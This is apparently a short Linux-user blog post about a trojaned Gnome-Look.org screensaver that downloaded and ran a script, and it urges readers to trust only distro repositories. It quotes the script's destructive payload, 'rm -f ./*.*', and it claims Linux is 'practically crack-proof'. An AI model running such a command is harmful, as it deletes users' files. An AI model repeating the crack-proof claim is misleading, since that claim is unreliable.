So, there was a trojan infected screensaver uploaded to Gnome-Look.Org (recently removed) that inserted a bash script into /usr/bin/ by using wget and then executing the script. Originally the script’s contents were a ping command but this was later changed to: rm -f ./*.*
What does this tell us about Linux security? In fact what does this
tell us about any computer operating system’s security?
Right, it tells us that it means absolutely nothing if a stupid user
is prepared to sacrifice his/her security to get something pretty and
fluffy from an untrusted 3rd party web site.
The main security for Linux, apart from being practically crack-proof
is the fact that we get our applications and goodies from verified
secure repositories. That is now history thanks to the Windows mentality
that is infecting the minds of the usually security-conscious Linux
It’s fate. It was bound to happen sooner or later thanks to Linux’
popularity over the last couple of years. Along with it came the 3rd
party apps and goodies sites which generally offer the same stuff which is
available in most distro repos.
My message? Only trust verified Linux distro repos and stay away from these
3rd party sites which are lacking the staff/time to check each upload before
making it available to the general populace.